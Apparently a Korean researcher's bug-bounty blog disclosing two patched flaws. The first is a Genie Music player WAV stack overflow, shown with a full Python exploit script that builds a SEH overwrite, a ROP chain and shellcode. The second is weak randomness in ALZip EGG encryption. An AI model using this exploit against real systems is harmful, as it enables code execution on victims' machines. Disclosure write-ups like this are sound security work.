공격자에 의해 특수하게 조작된 WAV파일을 지니뮤직 PC플레이어로 열면 공격자가 원하는 코드를 실행 가능합니다.

영향 받는 버전

• 지니 PC플레이어 1.1.2.15 (이외 버전에선 테스트 하지 않음.)

• 최신버전은 1.1.2.17 버전으로, 취약점이 패치된지 오랜시간이 지나 악용가능성이 낮다고 판단하여 공개합니다.

취약점 설명

WAV파일의 청크를 파싱하는 과정에서, chunkID 가 “data” 가 아닌 경우 chunkSize만큼 스택에 fread를 통해 적재하게 되는데 이때 파싱을 위해 스택에 선언한 변수의 크기는 아래 그림과 같이 128바이트 입니다.

정상적인 WAV파일 이라면 data청크를 제외한 청크의 크기는 작은 편이라 대부분의 경우 문제가 되지 않지만, 특수하게 조작하여 아래 그림과 같이 chunkSize가 128 이상이라면 스택 버퍼 오버플로가 발생하게 됩니다.

Exploit

취약점이 발생하는 메인 바이너리(geniemusic.exe) 는 스택쿠키, ASLR, NX가 적용되어 있습니다. 한편 메인 바이너리에서 사용하는 sqlite3.dll 에는 ASLR, NX, SafeSEH 등의 보호기법이 적용되어 있지 않습니다.

스택쿠기를 우회하기 위해서는 SEH Overwrite를 하면 되는데, ASLR이 적용되어 있지 않은 sqlite3.dll에 적당한 가젯이 없어 조금 해맸습니다.

SEH 익셉션이 났을때, ESP를 원래대로 돌리기 위해 sqlite3.dll에 있는 <add esp,0x71C [...] ret> 가젯을 사용하였습니다.

환경에 따라 익셉션이 났을때의 스택과 원래 스택간의 거리 차이를 고려하여 RET 슬렌딩 역시 사용하였고, 이로 인해 대부분의 환경에서 거의 예외없이 익스플로잇이 성공합니다.

한편, fread에서 단순히 많은 양을 스택에 읽도록 하여도 Access Violation이 일어나지 않을 수 있는데, chunkSize를 0x8000에서 0x10000까지 0x100 만큼 늘려가면서 총 128개의 청크를 작성하여, 거의 예외 없이 스택을 다써, Access Violation이 반드시 일어나게끔 익스플로잇을 작성하였습니다.

아래는 Exploit 진행 과정입니다.

SEH가 덮혀 0x61e6b62e의 주소로 EIP가 바뀐 모습:

RET 슬렌딩이 진행중인 모습:

RET슬렌딩 이후 스택에 ROP체인이 들어간 모습:

스택에 Execute 권한이 부여되어 정상적으로 쉘코드가 실행되는 모습:

전체 Exploit 코드 (당시 KISA에 제출한 Exploit 그대로이며, Python2로 작성되었습니다.) :

### make_ex.py
from struct import *
p32 = lambda x : pack('<L', x)
u32 = lambda x : unpack('<L', x)[0]

f = open("ex_real@@@.wav","wb")


rop_gadgets = [0x61e34d4a,  # POP EDX // RETN [sqlite3.dll] 
      0x61ea130c,  # ptr to &VirtualProtect() [IAT sqlite3.dll]
      0x61e03605,  # MOV EAX,DWORD PTR DS:[EDX] // POP EBP // RETN [sqlite3.dll] 
      0x41414141,  # Filler (compensate)

      0x61e34207,  # # PUSH EAX # POP EBX # POP ESI # POP EBP # RETN    ** [sqlite3.dll] ** 
      0x00000000,  # ESI ---> 0
      0x41414142,  # Temp?     
      0x61e8a4bc,  # # ADD ESI,EBX # RETN    ** [sqlite3.dll] **   |   {PAGE_EXECUTE_READ}

      0x61e2f59b,  # POP EBP // RETN [sqlite3.dll] 
      0x61e787e4,  # & push esp // ret 0x04 [sqlite3.dll]
      0x61e8a25d,  # POP EBX // RETN [sqlite3.dll] 
      0x00000201,  # 0x00000201-> ebx
      0x61e34d4a,  # POP EDX // RETN [sqlite3.dll] 
      0x00000040,  # 0x00000040-> edx
      0x61e8a6e8,  # POP ECX // RETN [sqlite3.dll] 
      0x61ea181f,  # &Writable location [sqlite3.dll]
      0x61e8a6b5,  # POP EDI // RETN [sqlite3.dll] 
      0x61e89941,  # RETN (ROP NOP) [sqlite3.dll]
      0x61e06256,  # POP EAX // RETN [sqlite3.dll] 
      0x90909090,  # nop
      0x61e21d2d,  # PUSHAD // ADD AL,89 // RETN [sqlite3.dll]
]
shellcode = "\x31\xD2\x52\x68\x63\x61\x6C\x63\x54\x59\x52\x51\x64\x8B\x72\x30\x8B\x76\x0C\x8B\x76\x0C\xAD\x8B\x30\x8B\x7E\x18\x8B\x5F\x3C\x8B\x5C\x1F\x78\x8B\x74\x1F\x20\x01\xFE\x8B\x54\x1F\x24\x0F\xB7\x2C\x17\x42\x42\xAD\x81\x3C\x07\x57\x69\x6E\x45\x75\xF0\x8B\x74\x1F\x1C\x01\xFE\x03\x3C\xAE\xFF\xD7"
ex_code = ""
#RET Sled
ex_code += p32(0x61e6b63a)*(0x3ac / 4)
#Pop-RET
ex_code += p32(0x61e6b639)
#add esp,0x71C // mov eax,ebx // pop ebx // pop esi // pop edi // pop ebp // ret
ex_code += p32(0x61e6b62e) #Seh.
for i in rop_gadgets:
    ex_code += p32(i)
ex_code += shellcode


### Header
f.write("\x52\x49\x46\x46\x98\x35\x00\x00\x57\x41\x56\x45\x66\x6D\x74\x20\x10\x00\x00\x00\x01\x00\x01\x00\xEF\x56\x00\x00\xEF\x56\x00\x01\x00\x08\x00d")
#Chunk

for i in xrange(0x8000,0x10000, 0x100):
    #Chunk
    data = "hell"
    data += p32(i)
    data += ex_code
    data += "A"*(i - len(ex_code) )
    f.write(data)
f.close()

보상금

210만원 받았습니다. 맛있는거 사먹었습니다.

알집에서 EGG 파일에 암호를 설정할 때, 난수로 채워져야 하는 부분이 잘못된 타입 캐스팅 때문에 항상 0 또는 1로 결정되는 취약점으로, 이로 인해 난수로 채워지는 부분에 대해 256^10의 경우의 수가 발생해야 하는데, 실제로는 2^10의 경우의 수만 발생하게 되어, Known Plaintext Attack에 대한 공격 복잡도가 크게 감소합니다. 또한 기본옵션인 “최적압축” 옵션으로 특정 확장자(docx, pptx, xlsx, png, 7z, gz 등.) 의 파일이 같이 압축될 시에는 공격의 복잡도가 추가로 감소합니다.

영향 받는 버전

• 알집 8.0.5.0 ~ 10.81

• 최신버전은 12.17 버전으로, 취약점이 패치된지 오랜시간이 지나 악용가능성이 낮다고 판단하여 공개합니다.

  영향 받는 파일

• 알집 8.0.5.0 ~ 10.81 버전으로 압축된 암호가 걸린 EGG 파일 (기본옵션으로 압축된 경우)

취약점 설명

EGG 파일은 압축파일에 비밀번호를 설정했을 때 아래 3가지 옵션을 지원합니다.

• Zip 2.0 Compatible (기본값)
• AES-128
• AES-256

이 중 Zip 2.0 Compatible 옵션은 ZipCrypto 혹은 PKZip StreamCipher 라고 불리는 암호를 의미하며, Zip 파일에서도 사용됩니다.

해당 암호의 간단한 Python 구현은 아래와 같습니다.

class PKZIPStreamCipher:
    def __init__(self, password):
        self.keys = [0x12345678, 0x23456789, 0x34567890]
        for char in password:
            self.update_keys(char)

    def update_keys(self, char):
        self.keys[0] = self.crc32(self.keys[0], char)
        self.keys[1] = (self.keys[1] + (self.keys[0] & 0xFF)) & 0xFFFFFFFF
        self.keys[1] = (self.keys[1] * 0x08088405 + 1) & 0xFFFFFFFF
        self.keys[2] = self.crc32(self.keys[2], self.keys[1] >> 24)

    def crc32(self, old_crc, char):

        POLY = 0xedb88320
        crc = old_crc ^ char
        for _ in range(8):
            if crc & 1:
                crc = (crc >> 1) ^ POLY
            else:
                crc >>= 1
        return crc & 0xFFFFFFFF

    def decrypt_byte(self):
        temp = (self.keys[2] & 0xFFFF) | 2
        return ((temp * (temp ^ 1)) >> 8) & 0xFF

    def encrypt(self, plaintext):
        ciphertext = []
        for char in plaintext:
            k = char ^ self.decrypt_byte()
            self.update_keys(char)
            ciphertext.append(k)
        return bytes(ciphertext)

    def decrypt(self, ciphertext):
        plaintext = []
        for char in ciphertext:
            k = char ^ self.decrypt_byte()
            self.update_keys(k)
            plaintext.append(k)
        return bytes(plaintext)


password = b"452345gedH"
cipher = PKZIPStreamCipher(password)
encrypted_data = cipher.encrypt(b"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x7B\x74")
print(encrypted_data)

구현에서 보는 바와 같이 태생이 스트림 암호이기 때문에, 압축파일에서 사용할 때는 실제 데이터 암호화에 앞서 무작위한 값 12바이트(혹은 무작위 값 10바이트 + 2바이트 CRC로 구성될 수 있음.) 를 암호화 한 후 사용합니다. (참고 : 7-zip의 해당 부분 구현)

이 암호는 1994년 Biham 과 Kocher에 의해 Known plaintext attack에 취약함이 알려졌습니다. 하지만 해당 공격에서 이야기하는 평문은 압축된 데이터이기 때문에, 데이터를 압축(Deflate 등) 해서 저장하였다면, 특정 파일 전체를 아는것이 아닐 경우, 파일 헤더등 파일 내용의 일부를 알아도 공격이 쉽지 않습니다.

한편, 알집으로 압축할 때, EGG 포맷에서는 "최적압축"이 기본옵션인데, 이 기능은 확장자 별로 압축 알고리즘을 다르게 적용하는 기능입니다. (개인적으로 이 기능은 확장자가 아니라 파일의 엔트로피값을 이용하여 구현하여야 한다고 생각합니다.)

이 중 Store는 압축 없이 저장하는 것을 의미합니다.

Store로 압축하는 확장자중에서는 고정된 헤더를 쓰는 파일이 많으며, 정리하면 아래와 같습니다.

한편, 무작위한 데이터를 넣어야 할 부분을 분석하여 보면, rand() 함수가 사용되는 것을 알 수 있습니다.

이것 자체로도 문제가 있지만, 잘못된 type-casting 으로 인해, (rand() % 0x7fff) 의 MSB 비트만 남게 되어, 경우의수가 크게 감소합니다.

따라서 ZIP Plaintext Attack 의 전제조건인 파일의 일부 내용을 알 필요 없이도 Known Plaintext attack이 가능합니다.

또한 위에서 설명한 "최적압축" 기능 때문에 일부 확장자의 파일이 같이 압축된 경우, 공격에 소요되는 시간을 크게 단축시킬 수 있습니다.

POC

파일 내용을 아주 조금 알 수 있는 경우 (7z)

파일 내용을 조금 알 수 있는 경우 (pptx)

파일 내용을 전혀 모르는 경우 (txt)

주저리주저리

이 취약점은 제가 처음으로 버그바운티를 통해 보상금을 받은 취약점입니다.

보상금으로는 270만원을 받았는데, 당시 고등학교 2학년이였던 저에겐 꽤 큰 돈이였습니다.

보상금은 몇달 뒤에 모스크바에서 열린 한 해킹대회의 본선에 참여할 때 여행경비로 잘 썼습니다.

슬프게도 당시의 보고서와 POC코드를 분실했습니다.ㅜㅜ

남아있는 영상과 프로그램을 바탕으로 글을 작성했습니다.